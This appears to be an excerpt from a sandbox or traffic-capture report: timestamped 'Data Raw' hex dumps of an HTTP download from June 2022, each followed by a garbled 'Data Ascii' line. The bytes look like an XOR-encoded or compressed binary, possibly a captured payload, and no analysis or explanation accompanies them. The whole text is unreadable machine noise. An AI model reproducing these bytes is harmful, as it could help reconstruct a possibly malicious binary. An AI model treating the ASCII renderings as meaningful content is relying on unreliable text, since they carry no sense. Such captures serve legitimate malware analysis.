                                                                              Data Ascii: 007 0M0m ~":vl x"kr ~" ~"vtvrvp x"(#vyj@h x% #"(j@hj@hQaJ;8 j@hjbAh
                                                                              2022-06-01 23:53:22 UTC4INData Raw: f8 6a 36 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 6a 44 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 0e 25 76 6a 60 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 6a 72 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 6a 82 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 6a 8c 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 6a 9c 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 6a ae 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b f8 f8 fe 58 6a c0 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0c f8 f8 fe 58 13 24 8c 6a 10 44 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0c f8 f8 fe 58 76 5b f8 f8 fc 6a 54 44 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 c0 f8 f8 fe 58 76 5b f8 f8 fc 6a 8e 44 f8 68 18 e0 fb
                                                                              Data Ascii: j6Ch % jDCh % X%vj`Ch % XjrCh % XjCh % XjCh % XjCh % XjCh % XjCh % X$jDh % Xv[jTDh % Xv[jDh
                                                                              2022-06-01 23:53:22 UTC5INData Raw: f8 1e ff 31 4b f9 f8 f8 fa 6b 8a f8 f8 02 0d 32 08 f9 f8 f8 1e 15 24 55 76 a1 f8 f8 fc fa 6b 8a f8 f8 02 20 29 f9 f8 fe 76 a1 f8 f8 fc fb 6b 8a f8 f8 02 20 29 f9 f8 fe f6 f9 0e f6 f9 0e 31 df f8 f8 f8 1e 01 31 d0 f8 f8 f8 76 a8 f8 f8 fc 76 a5 f8 f8 fc fb 20 2c f9 f8 fe 6a a2 42 f8 68 6a 1c 42 f8 68 20 2f f9 f8 fe 20 14 f8 f8 fe 13 32 b4 f8 f8 f8 1e 09 fc 31 9e f8 f8 f8 76 7b f8 f8 fc 76 a8 f8 f8 fc 76 a5 f8 f8 fc fb 20 2c f9 f8 fe 6a a2 42 f8 68 6a 1c 42 f8 68 20 2f f9 f8 fe 20 ed f8 f8 fe 10 32 84 f8 f8 f8 1e 0e 0b fe 23 56 0e 25 b9 09 fd 6d fc f8 f8 13 09 fe 92 0b ff 76 4b f8 f8 fc 09 ff 6c 08 f8 f8 f9 20 a2 f8 f8 fe 76 4b f8 f8 fc 76 70 f8 f8 fc 20 e1 f8 f8 fe 20 a2 f8 f8 fe f6 f9 0e 1d 25 19 f6 f9 0b 00 09 00 24 0e 76 97 f8 f8 fc 09 ff 6d 08 f8 f8 f9
                                                                              Data Ascii: 1Kk2$Uvk )vk )11vv ,jBhjBh / 21v{vv ,jBhjBh / 2#V%mvKl vKvp %$vm
                                                                              2022-06-01 23:53:22 UTC6INData Raw: 14 1e 76 9b f8 f8 fc 09 fe 6d 0a f8 f8 f9 14 25 08 1e 1e d6 0e 0b fc 23 c2 0b fd 23 c4 0b fe 23 d9 20 20 f9 f8 fe 23 e3 1e d6 f8 0e 31 34 f9 f8 f8 18 eb 1e 32 f9 0b ff 0a ff 20 7f f8 f8 02 03 18 99 b8 a9 2f 04 1b f8 f8 f8 98 70 26 c4 3a 05 0e 25 1b 30 cf f8 f8 f8 76 b9 f8 f8 fc 76 b8 f8 f8 fc 1b f8 f8 f8 f8 f8 f8 f8 38 20 47 f9 f8 fe 20 47 f9 f8 fe 05 00 0b 00 09 00 18 1c 80 fc f8 f6 f9 0b 01 09 01 24 00 09 00 0f 50 0b 00 23 fe 09 00 0f 51 0b 00 00 17 59 50 17 59 51 00 53 0b ff 0a ff 20 7f f8 f8 02 03 00 0b 02 09 02 18 83 42 ae 10 f6 f9 0b 03 09 03 24 00 09 02 0f 50 0b 02 23 fe 09 02 0f 51 0b 02 d6 fb 1e d6 f8 0e 0b 04 0f 24 23 23 21 76 79 f8 f8 fc ff 6d 07 f8 f8 f9 00 18 24 44 5c 12 53 00 59 0b ff 0a ff 20 7f f8 f8 02 20 ea f8 f8 fe 03 09 04 0f 50 0b 04
                                                                              Data Ascii: vm%### #142 /p&:%0vv8 G G$P#QYPYQS B$P#Q$##!vym$D\SY P
                                                                              2022-06-01 23:53:22 UTC8INData Raw: 76 01 f8 f8 fc 18 f7 f8 f8 f8 f6 fb 0e f6 f9 12 32 9f f8 f8 f8 1e 0e 25 72 fe 25 c0 0e 78 01 f8 f8 fc 23 73 76 02 f8 f8 fc 76 00 f8 f8 fc 76 01 f8 f8 fc 66 76 00 f8 f8 fc 86 61 62 55 cc 89 50 76 04 f8 f8 fc 76 01 f8 f8 fc 8d 0e 25 e9 13 24 e6 50 18 f7 f8 f8 f8 57 78 02 f8 f8 fc 76 04 f8 f8 fc 76 01 f8 f8 fc 8d 78 03 f8 f8 fc 76 04 f8 f8 fc 76 01 f8 f8 fc 76 04 f8 f8 fc 76 02 f8 f8 fc 8d 96 76 04 f8 f8 fc 76 02 f8 f8 fc 76 03 f8 f8 fc 96 76 01 f8 f8 fc 0f 50 78 01 f8 f8 fc 76 01 f8 f8 fc 18 f7 f8 f8 f8 1d 24 fb f6 fb 0e f6 f9 12 25 06 1e ff 32 61 f7 f7 f7 22 02 30 4c f7 f7 f7 03 23 e8 f8 f8 f8 13 28 fc f8 25 f9 f8 f8 00 f8 f8 09 6a 2e 47 f8 68 6a 56 47 f8 68 76 be f8 f8 fc 20 50 f9 f8 fe 20 32 f8 f8 fe 1e 6a 36 43 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 20 0b
                                                                              Data Ascii: v2%r%x#svvvfvabUPvv%$PWxvvxvvvvvvvvPxv$%2a"0L#(%j.GhjVGhv P 2j6Ch %
                                                                              2022-06-01 23:53:22 UTC8INData Raw: fe 23 ec 1e d6 f8 fa fc 11 25 ff 1e 1e 16 24 ee d6 02 20 2b f8 f8 fe 23 ec 1e d6 f8 22 f8 f8 f8 f9 14 f8 f8 f8 f8 12 f8 f1 0b f9 fb f9 f8 f8 f9 f8 f8 0e f9 0b 21 f9 fb f9 f8 f8 f9 0b 28 00 f8 5f f9 f8 f8 0a f8 f8 09 76 9e f8 f8 fc 76 fe f8 f8 fc 6a 16 45 f8 68 20 23 f9 f8 fe 0f 32 1e f9 f8 f8 1e fe 31 be f8 f8 f8 76 9f f8 f8 fc 76 fa f8 f8 fc 76 65 f8 f8 fc 14 85 07 f8 f8 f9 1d 0e 76 80 f8 f8 fc 10 20 f9 f9 f8 fe 9a 1d 0f 6a 82 40 f8 68 9a 1d 10 76 fd f8 f8 fc 9a 1d 11 6a 82 40 f8 68 9a 1d 12 76 fd f8 f8 fc 9a 1d 13 6a a2 42 f8 68 9a 20 cc f8 f8 fe 20 23 f9 f8 fe 76 fa f8 f8 fc 76 fc f8 f8 fc 1d 25 fc 1e 0c 23 fd 67 1a f8 f8 02 76 fd f8 f8 fc 6a a2 42 f8 68 20 26 f8 f8 02 20 37 f8 f8 02 58 76 9f f8 f8 fc 76 fa f8 f8 fc 76 81 f8 f8 fc 76 80 f8 f8 fc 15 20
                                                                              Data Ascii: #%$ +#"!(_vvjEh #21vvvev j@hvj@hvjBh #vv%#gvjBh & 7Xvvvv
                                                                              2022-06-01 23:53:22 UTC9INData Raw: 19 1e 0e 25 04 fe 86 0e 25 fb 0e f6 fb 0e 24 0d 1e ff 24 ff 0f 14 25 08 1e d6 13 0e 14 25 04 1e d6 0c 02 23 d5 03 23 e1 04 23 e6 04 23 ea 1e 10 24 fa 0e 04 d6 f8 00 22 f8 f8 f8 f9 08 f8 f8 f8 f8 f8 f8 47 47 f8 00 f9 f8 f8 f9 0b 28 fc f8 1f f8 f8 f8 ff f8 f8 09 17 0d 85 4b f8 f8 f9 1d c8 36 f8 f8 fc 12 25 05 1e 1e 12 25 07 1e fe 6d fa f8 f8 13 22 20 f9 f8 f8 02 23 e6 02 23 e7 f8 0b 28 fe f8 b3 f8 f8 f8 01 f8 f8 09 17 08 85 4b f8 f8 f9 1d c8 34 f8 f8 fc 12 32 8d f8 f8 f8 1e 1e 0e 31 8f f8 f8 f8 1e 17 01 85 07 f8 f8 f9 1d 0e 76 c4 f8 f8 fc 76 6f f8 f8 fc 20 de f8 f8 fe 20 34 f8 f8 fe 20 56 f9 f8 fe 9a 1d 0f 6a fe 48 f8 68 9a 1d 10 fb 9a 1d 11 6a 72 40 f8 68 9a 1d 12 76 fc f8 f8 fc 1d 25 fc 1e 0c 23 fd 67 1a f8 f8 02 9a 1d 13 fa 9a 1d 14 6a 04 48 f8 68 9a 1d
                                                                              Data Ascii: %%$$%%####$"GG(K6%%m" ##(K421vvo 4 VjHhjr@hv%#gjHh
                                                                              2022-06-01 23:53:22 UTC11INData Raw: f8 fc 77 10 f8 f8 fc 73 12 f8 f8 fc 09 fd 09 04 18 f8 28 f8 f8 17 38 67 6c f8 f8 fe 0b 06 fd 25 ff 09 06 0e f6 f9 23 f9 0e 0b 07 0f 0b 08 09 07 0b 1c 09 1c 24 1b 0f 0b 08 76 0f f8 f8 fc 77 10 f8 f8 fc 73 12 f8 f8 fc 0e 09 04 18 f8 28 f8 f8 17 38 67 6c f8 f8 fe 0b 06 09 06 0e f6 f9 0b 09 09 09 0b 1d 09 1d 24 fe 6b 87 f8 f8 02 72 76 0e f8 f8 fc 77 10 f8 f8 fc 73 12 f8 f8 fc 09 06 fc 09 05 0a 01 67 68 f8 f8 fe 0e f6 f9 0b 0a 09 0a 0b 1e 09 1e 24 fe 6b 87 f8 f8 02 72 09 fc 18 f0 f8 f8 f8 ce 0b 0b fc 09 fc 14 ce 20 3b f8 f8 fe 0b 0c 09 0c 0f d2 0b 0d 0e 0b 1f 30 aa f8 f8 f8 fc 09 0b 17 04 ce 20 3a f8 f8 fe 0b 20 fc 09 0b 17 08 ce 20 3a f8 f8 fe 0b 21 fc 09 0b 17 0c ce 20 3a f8 f8 fe 0b 22 09 21 0e f6 fb 0b 23 09 23 0b 24 09 24 24 61 09 21 0f d2 0f ce 85 4b f8
                                                                              Data Ascii: ws(8gl%#$vws(8gl$krvwsgh$kr ;0 : :! :"!##$$$a!K
                                                                              2022-06-01 23:53:22 UTC12INData Raw: f8 f9 1d 0e fe 9a 20 5d f8 f8 02 6c fa f8 f8 13 13 32 7d f8 f8 f8 1e 20 ff f8 f8 02 ff 67 00 f8 f8 02 6a bb 73 f8 68 67 01 f8 f8 02 0d 25 6a 1e 00 6a e5 73 f8 68 18 e0 fb f8 f8 20 25 f8 f8 fe 67 02 f8 f8 02 0f 85 0d f8 f8 f9 1d 0e c8 ff f8 f8 13 20 10 f8 f8 02 9a 67 94 f8 f8 02 14 25 3c 1e 01 0c 0f 85 f9 f8 f8 f9 1d 0e fa fb 20 56 f8 f8 fe 84 30 f8 f8 f9 9a 67 03 f8 f8 02 9d ff f8 f8 13 16 25 1a 1e 12 31 45 f7 f7 f7 09 fc 22 02 30 3c f7 f7 f7 02 30 43 f7 f7 f7 03 30 6e f7 f7 f7 04 23 84 05 23 b2 0b fc 23 d3 f8 f8 16 fa 20 7e f8 f8 02 22 16 fa 20 7e f8 f8 02 22 fb 28 fb f8 49 f8 f8 f8 f8 f8 f8 f8 6a 21 74 f8 68 6a 4e 48 f8 68 20 57 f8 f8 fe 6a 2d 74 f8 68 6a 4e 48 f8 68 20 57 f8 f8 fe 20 fd f8 f8 23 78 0c f8 f8 fc 6a 3c 48 f8 68 6a 4e 48 f8 68 20 57 f8 f8
                                                                              Data Ascii: ]l2} gjshg%jjsh %g g%< V0g%1E"0<0C0n### ~" ~"(Ij!thjNHh Wj-thjNHh W #xj<HhjNHh W
                                                                              2022-06-01 23:53:22 UTC13INData Raw: f8 f8 f8 f8 18 f9 f8 f8 18 f9 f8 f8 00 f8 f8 f8 f9 f8 f8 f9 0b 28 00 f8 cb f8 f8 f8 1c f8 f8 09 0e 10 32 a5 f8 f8 f8 1e 76 6b f8 f8 fc 76 6e f8 f8 fc 20 de f8 f8 fe fb 20 db f8 f8 fe 0d 32 8f f8 f8 f8 1e 0e 62 0e 31 8c f8 f8 f8 1e 23 53 fa 00 fa 86 61 62 55 cc 76 d7 f8 f8 fc 76 d5 f8 f8 fc fa 00 fa 86 61 62 55 cc 89 ff 00 ff 86 61 62 55 cc 89 59 20 80 f9 f8 fe 76 d6 f8 f8 fc fa 00 0f 62 50 fa 86 61 62 55 cc 89 20 83 f9 f8 fe 51 18 f8 f9 f8 f8 50 18 f8 f9 f8 f8 55 20 86 f9 f8 fe 94 00 0f 62 50 0e 24 35 1e 00 fa 86 61 0f 51 62 fe 0f 50 66 52 f6 fa 0e f6 f9 16 25 23 1e 01 25 85 07 f8 fa 86 61 0f 51 0e 24 18 1e 1e fa 0b fc 09 fc 22 02 30 46 f7 f7 f7 03 30 5c f7 f7 f7 04 30 5f f7 f7 f7 04 23 b9 05 23 cb 20 02 f8 f8 23 23 d3 f8 0b 28 fa f8 08 f8 f8 f8 0c f8 f8
                                                                              Data Ascii: (2vkvn 2b1#SabUvvabUabUY vbPabU QPU bP$5aQbPfR%#%aQ$"0F0\0_## ##(
                                                                              2022-06-01 23:53:22 UTC15INData Raw: f8 f8 fc 09 fc 18 f9 f8 f8 02 50 20 9c f8 f8 02 20 9d f8 f8 02 6c 0e f8 f8 f9 0b 00 d6 fe 1e d5 3b f9 f8 f8 09 00 67 9e f8 f8 02 24 12 ff 67 9f f8 f8 02 09 00 20 a0 f8 f8 02 0b 01 d5 10 f9 f8 f8 1e d5 18 f9 f8 f8 09 00 67 a1 f8 f8 02 0b 02 09 02 86 61 0f 50 0b 03 09 03 85 0d f8 f8 f9 0b 04 09 04 0e c8 f9 f8 f8 f9 20 10 f8 f8 02 9a 0f 0b 05 23 15 09 04 09 05 09 02 09 05 0f 51 92 67 a2 f8 f8 02 9a 09 05 0f 1d 31 82 f8 f8 f8 50 0b 05 09 05 09 03 2a d5 76 93 f8 f8 02 09 00 67 a3 f8 f8 02 09 04 fe 0f 6b a4 f8 f8 02 0b 06 09 06 67 a5 f8 f8 02 0b 07 09 07 76 a6 f8 f8 02 67 a7 f8 f8 02 09 03 0f 29 04 09 07 76 a8 f8 f8 02 67 a7 f8 f8 02 09 03 10 29 04 09 07 76 a9 f8 f8 02 67 a7 f8 f8 02 09 03 11 29 04 09 07 76 aa f8 f8 02 67 a7 f8 f8 02 09 03 12 29 17 12 0b 08 23
                                                                              Data Ascii: P l;g$g gaP #Qg1P*vgkgvg)vg)vg)vg)#
                                                                              2022-06-01 23:53:22 UTC16INData Raw: 1d 0f 50 04 89 17 08 5a 50 76 43 f8 f8 fc 00 1d 0f 50 04 89 16 5a 50 76 43 f8 f8 fc 00 1d 0f 50 04 89 50 03 76 5e f8 f8 fc 76 e3 f8 f8 fc 76 6f f8 f8 fc 20 de f8 f8 fe 76 43 f8 f8 fc 00 ff 20 9b f9 f8 fe 20 c3 f8 f8 fe 0b fc 76 a6 f8 f8 fc 76 e3 f8 f8 fc 76 6f f8 f8 fc 20 de f8 f8 fe 09 fc 0e 09 fc 86 61 20 9b f9 f8 fe 20 2c f9 f8 fe 0b fd 76 45 f8 f8 fc 24 0a 76 44 f8 f8 fc fa 09 fd 67 bd f8 f8 02 d6 fb 1e d6 f8 09 fd 0b fe d6 01 1e 0e 25 fb 0c 0b fe d6 f8 09 fe 22 08 f8 30 cd f6 f7 f7 03 30 e9 f6 f7 f7 04 30 eb f6 f7 f7 04 30 f8 f7 f7 f7 05 30 fa f7 f7 f7 03 30 05 f7 f7 f7 f8 f8 f9 14 f8 f8 f8 f8 09 f9 07 18 f9 fb f9 f8 f8 f9 f8 f8 b4 f8 65 21 f9 01 f9 f8 f8 f9 13 28 fd f8 f6 f8 f8 f8 24 f8 f8 09 6a 16 48 f8 68 78 41 f8 f8 fc 6a 67 76 f8 68 78 42 f8 f8
                                                                              Data Ascii: PZPvCPZPvCPPv^vvo vC vvvo a ,vE$vDg%"000000e!($jHhxAjgvhxB
                                                                              2022-06-01 23:53:22 UTC17INData Raw: 23 f0 f8 32 17 6e 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 6f 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 70 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 71 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 72 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 73 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 74 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 75 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 76 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 32 17 77 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 3e 18 78 f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 79 f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 7a f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 7b f8 f8 f8 14 25 fa 1e 22 20 95 f8 f8 fe 23 f0 f8 f8 3e 18 7c f8 f8 f8 14 25 fa 1e 22 20
                                                                              Data Ascii: #2n%" #2o%" #2p%" #2q%" #2r%" #2s%" #2t%" #2u%" #2v%" #2w%" #>x%" #>y%" #>z%" #>{%" #>|%"
                                                                              2022-06-01 23:53:22 UTC19INData Raw: ae 37 b3 46 49 de f9 5a 6b db b6 a5 51 55 31 75 b9 e6 f5 5f 99 a4 3e bc 49 20 f0 65 47 9e 19 b9 da 18 49 8f e5 83 3f 6d 69 18 04 ea 1d d8 b5 e3 a9 04 12 47 c2 81 5f c6 03 18 a3 d3 7b 9e 76 63 cf 0a 76 a5 18 70 bb 59 61 27 ad 5c 8a 44 36 ce 52 7d 78 44 57 6b f3 67 e9 30 c7 5e fc 49 2d bf b1 19 61 47 5e 71 c9 bf 9a a4 2a f3 a3 b7 7c f6 6f b1 80 c6 3a 98 08 fd 4e 64 59 be c2 95 35 f8 8c 15 6f 6c 09 3d fa bd b0 10 18 39 2d fd 20 91 52 f0 a7 8b b4 e9 df 86 b8 65 48 a6 9b 41 a4 d6 f8 5e 02 f5 81 1b 6f 65 e5 99 c1 92 3e bc a7 14 56 81 d5 d2 a4 b1 75 7d c3 cf af ee 19 85 8e 5b d8 2f 6f 7d ab 6c eb 4c 16 71 f9 96 30 f0 f3 e7 36 d3 1d a8 8f f5 1f a4 fd d9 b3 1c 24 e0 f3 12 e9 c1 5d 8e ea 4a 13 f9 86 4a 55 47 13 aa 62 3e f9 63 ff d5 d9 40 80 3f 03 c6 71 8a 28 c0 df
                                                                              Data Ascii: 7FIZkQU1u_>I eGI?miG_{vcvpYa'\D6R}xDWkg0^I-aG^q*|o:NdY5ol=9- ReHA^oe>Vu}[/o}lLq06$]JJUGb>c@?q(
                                                                              2022-06-01 23:53:22 UTC20INData Raw: cb 5a ac 96 03 de 37 5d 9e b6 5f 83 8c c7 36 33 91 4d 6a 37 51 9e 97 db d8 51 d7 e3 72 67 2d c2 7d a2 55 a6 c5 b4 eb d0 fb 59 5c 04 e2 c0 72 a1 aa a0 7b 8e 1d 75 4f ff e0 d4 e3 3a 42 74 d8 1f ce b0 85 67 a7 85 53 55 93 67 a0 02 05 7f 43 66 e5 e9 0a b1 8b 86 37 a9 89 5c bf 90 a1 4e 3f c9 fc 69 33 a1 29 e4 a9 7e 54 58 58 37 6a 12 be c1 0f e8 f6 a5 15 c9 12 80 aa b1 9f 04 8f 86 5c 93 b9 af 40 36 09 6e 81 49 73 ae 75 c6 80 4b 3b e3 32 06 7b 03 31 64 e0 d6 c4 cc ab 76 6e c2 38 92 1f 2f ad cd e6 5a 47 7d 02 4a 92 c2 62 86 21 04 9b fe 4c 5f 2e 6b 7a 72 22 3c 94 b7 7c e4 78 ab c1 ee f9 c4 94 9b 8b 46 22 3c 99 ab ad 33 52 f8 30 32 db 28 a2 3a 77 fe 9b 48 a1 ee ac db 8a f8 dd fa 1d 6e c2 7e a5 8f cf 70 0c 25 9b 26 51 4d 47 66 48 89 b6 2f 78 94 ef be b1 6f 3a e9 b0
                                                                              Data Ascii: Z7]_63Mj7QQrg-}UY\r{uO:BtgSUgCf7\N?i3)~TXX7j\@6nIsuK;2{1dvn8/ZG}Jb!L_.kzr"<|xF"<3R02(:wHn~p%&QMGfH/xo:
                                                                              2022-06-01 23:53:22 UTC21INData Raw: 87 ae ba f9 49 94 0d 42 88 f6 a1 f9 0d 81 fb 85 9d 5d 3f 9e 0e b3 5b e8 65 ec b5 6b ee 51 d4 f5 11 28 a6 92 23 75 a5 b2 c1 e3 6b 57 b2 27 86 9e 96 5a 7f d2 0e e7 37 bd 14 1e 67 c2 65 ae dc 36 8d 26 6d 55 41 bb 48 06 b3 f2 b3 c6 3e 76 e4 70 df df 4b c1 8d 68 e7 37 d3 da ed d8 c1 4f 5b 0f 58 ad d3 15 19 c0 3b bb db e9 b0 95 0b af 8a 13 30 88 2e ef 05 a6 5d 5e 5d 80 82 3d 63 1a f0 72 9e 10 71 b6 29 3e 22 c0 52 c6 2e 63 bb 15 cb 80 a7 d8 3b c2 6b d4 65 0c a7 86 ff 4c 10 f6 12 27 b5 d1 9b a8 76 95 9e ac 1b 34 d6 f6 4b 36 3b 06 8c 91 62 fb 22 6d 9f d3 ce 67 20 5d 59 fe 3c 45 6a 43 23 b0 af bf 76 83 2b 9e 35 59 3e 28 d0 37 63 62 51 fd af 3d ee bb a4 d0 a9 aa 2c f0 c7 e3 fb a8 3a 3f 65 9b d9 4d ee 18 9c 31 aa 38 ef 79 bf 36 83 ed c7 71 7b 70 7a 11 16 44 2e 28 1c
                                                                              Data Ascii: IB]?[ekQ(#ukW'Z7ge6&mUAH>vpKh7O[X;0.]^]=crq)>"R.c;keL'v4K6;b"mg ]Y<EjC#v+5Y>(7cbQ=,:?eM18y6q{pzD.(
                                                                              2022-06-01 23:53:22 UTC23INData Raw: c0 0a e6 71 40 5e 90 90 d8 5b a8 9a 78 b9 99 85 a3 87 40 ec 1d dc ad 0c ce 0a 56 d9 2d 99 de c7 54 1c ab cf 8c b4 35 cf 1b ca cc 6f 38 d9 50 4b 4d ac bc 13 1f 7a 32 ac b3 d5 1d ee 4e 84 19 a4 22 25 89 78 8d 39 3b b4 47 cd e3 63 bc 6a 5d 7a 39 56 fc 2f 0f 3c 74 b1 bc fb b1 34 0d 04 f4 61 bc 7a c2 69 81 5a 87 bb 35 0d d3 e4 73 d7 c1 3e bc 0f 5f 84 79 e1 83 81 19 db 67 b8 0a 4d 2d 91 30 1f 90 24 28 0f ac a2 81 70 fd 33 ae 30 ee 54 3e e9 f2 b6 d7 fc 00 09 fe bd 2e e0 10 c6 08 22 a1 b5 1c 36 6b 2e e5 11 1c 7b 28 03 d6 5f f3 56 d9 27 ff f1 06 72 30 39 0a 11 e2 7c 7b da 8d dc 69 59 f2 ff cd 6e 6d 41 55 58 31 91 cc 23 68 6c 0c 4f 91 1b 03 1f 19 0e e0 2a b8 3d 54 30 ac 53 14 f1 3e 3f 90 db 96 66 8d 1c d0 ca f9 d4 05 a9 49 8f e1 03 b1 1e f4 11 7e a5 03 4f 81 b9 4b
                                                                              Data Ascii: q@^[x@V-T5o8PKMz2N"%x9;Gcj]z9V/<t4aziZ5s>_ygM-0$(p30T>."6k.{(_V'r09|{iYnmAUX1#hlO*=T0S>?fI~OK
                                                                              2022-06-01 23:53:22 UTC24INData Raw: cb 6a 3b cb b5 42 e9 27 ec 41 ca 0b 99 70 be 06 d1 78 f9 85 ef a1 43 21 6a 58 ae 04 fb e7 35 7f 79 4a ed 0a 80 33 39 a8 14 d6 43 1a 68 8e 48 53 5c a2 da 77 f6 93 11 a8 20 eb 57 d7 68 74 cf c3 40 1e 62 48 03 47 94 a9 0e 9d 2f 9a 01 fe b9 ff f4 de 20 2b 9b c4 c1 d2 42 a5 28 fa 87 2a ff 8d 01 39 da 11 33 49 2e d9 4b a0 4f f7 e5 2a 0b c8 9c b0 db 4b 6a 68 43 82 d4 a2 8f 20 08 23 11 d0 ad bc 73 a9 7c 1f be b8 5f 76 66 bd 14 00 90 18 40 69 a8 76 2d cc b2 2f b1 43 81 cc bb c4 5e a6 b4 30 df 6b 71 8b bf 08 be c7 61 f0 f6 3e 62 ce d1 b0 c3 9e 05 7b 58 e9 3d af 88 57 08 b6 9c 8f fb 95 20 db 9f 00 da df 6f 82 90 cf 05 4d 75 cf a2 32 e1 26 d8 ae f0 30 85 0b 79 07 87 4f 79 03 63 a0 63 d7 57 5f db 42 6e 5f 76 ae 28 c4 5b 5f 08 e4 fd 2b d5 1b d4 43 f8 40 fe ba ef 73 55
                                                                              Data Ascii: j;B'ApxC!jX5yJ39ChHS\w Wht@bHG/ +B(*93I.KO*KjhC #s|_vf@iv-/C^0kqa>b{X=W oMu2&0yOyccW_Bn_v([_+C@sU
                                                                              2022-06-01 23:53:22 UTC25INData Raw: b6 d9 c0 0f f1 c0 a7 3a de f3 07 d4 08 61 7b 06 72 2f 2f 61 67 c5 35 9b ba 72 af a2 69 95 50 ed 9f 28 c9 7c 59 66 ff 46 09 7b 89 6e 88 a7 95 1f 32 16 21 9c 1d 15 f3 91 a0 04 cd 4f 19 ae d6 eb fb 9d 3b ec 58 76 0f 67 5e e9 b9 dd fe fb 40 88 8d 0d bc 0d 05 79 db 02 3c 71 80 ac da 06 a1 25 c3 14 08 70 ee ec 1b 2a 50 a7 ac 2c 84 19 fe 63 b3 9a f5 2c 38 25 0d 4a 86 0c 22 4b 87 93 c6 54 50 33 db b7 17 35 0c 02 32 c5 aa 6c eb d8 a7 4e 03 6d 45 d0 4a 17 71 4f 1d eb 71 44 94 e7 91 c8 cd f0 7b a3 ea db 05 9a e5 58 27 bd 27 2d 76 65 61 ce ac ca d9 07 5b ba e5 21 ab d1 3a 00 c1 60 73 1d 90 04 ca cc 83 cd d1 01 6a 08 dd 4f a7 70 ce b4 a9 fe 1c 86 73 79 4d 71 ad ee f6 e7 11 95 2c 74 89 14 c5 90 0d bf 38 d2 b2 e5 d7 2f 64 9b 93 d1 67 54 fe 5a ae 82 46 8e 89 57 3c c5 a8
                                                                              Data Ascii: :a{r//ag5riP(|YfF{n2!O;Xvg^@y<q%p*P,c,8%J"KTP352lNmEJqOqD{X''-vea[!:`sjOpsyMq,t8/dgTZFW<
                                                                              2022-06-01 23:53:22 UTC26INData Raw: 0f 38 83 97 ad 7b 18 be 18 27 5b 18 6c 61 65 5d 67 6d 6c 18 2d 18 1e 1e 18 65 67 6e 5d 6e 6b 6b 5d 6a 6e 59 2a 5f 6d 59 6a 5c a4 b6 ac 59 a6 c4 9c ca c0 c6 37 20 82 8d 3f 51 fa fe c6 b9 5b be 59 0f fb 34 ed 81 4e 87 84 a2 17 fb e0 5e 99 32 0f fb 50 ff 6c d5 70 15 1e b5 05 7b 34 98 02 6f bb 19 43 10 15 c8 df af e3 0c 38 42 78 b2 04 25 76 90 53 f9 c2 09 c4 a8 56 75 20 25 43 34 d6 4b ea 38 8f 90 6b db 81 95 fb ad 01 74 30 96 93 62 a8 d6 fc 9a 3c 01 a4 aa 4b 92 b1 97 9f b2 63 a7 2d e4 4e 38 1a 6b b0 92 07 b4 f5 0c ff 47 6f b6 d8 b5 73 64 2f 33 06 e1 8b dc 3c d0 21 e0 ed 3f 41 51 3e 42 3f 53 40 35 1d 61 8b 7f 03 8f a3 fb 1b f1 b5 e1 37 f6 6f f1 d6 64 a4 35 27 d7 68 1d be ad c1 a5 01 24 6f 7d 6d 35 3e c5 9f 7e d5 f2 31 38 ad 27 23 03 00 42 d8 44 63 d2 a5 02 06
                                                                              Data Ascii: 8{'[lae]gml-egn]nkk]jnY*_mYj\Y7 ?Q[Y4N^2Plp{4oC8Bx%vSVu %C4K8kt0b<Kc-N8kGosd/3<!?AQ>B?S@5a7od5'h$o}m5>~18'#BDc
                                                                              2022-06-01 23:53:22 UTC28INData Raw: f8 00 f8 f8 f8 fc f8 f8 f8 0a f8 f8 f8 f9 f8 f8 f8 ff f8 f8 f8 f9 f8 f8 f8 0e f8 f8 f8 f9 f8 f8 f8 02 f8 f8 f8 f8 f8 f9 f8 f9 f8 f8 f8 f8 f8 fe f8 15 f8 1c f8 fe f8 31 f8 1c f8 02 f8 7b f8 66 f8 fe f8 c4 fa 1c f8 fe f8 01 fb 1c f8 fe f8 68 fc 71 fc 06 f8 17 fe 25 fe fe f8 38 fe 48 fe fe f8 59 fe 65 fe fe f8 7a fe 1c f8 fe f8 87 fe 94 fe fe f8 af fe be fe fe f8 ee fe 1c f8 fe f8 f4 fe 1c f8 fe f8 07 ff 1c f8 06 f8 1c ff 25 fe fe f8 3b ff 1c f8 fe f8 50 ff 57 ff fe f8 72 ff 1c f8 fe f8 81 ff 8a ff fe f8 a7 ff 1c f8 fe f8 b9 ff 8a ff fe f8 c7 ff 8a ff fe f8 e2 ff e7 ff fe f8 f8 00 e7 ff fe f8 1d 00 1c f8 06 f8 36 00 25 fe 06 f8 78 00 25 fe fe f8 9b 00 a3 00 fe f8 d9 00 1c f8 fe f8 09 01 1c f8 fe f8 a0 01 e7 ff 0a f8 58 fb c0 01 fe f8 ef 01 1c f8 83 f8 09 02
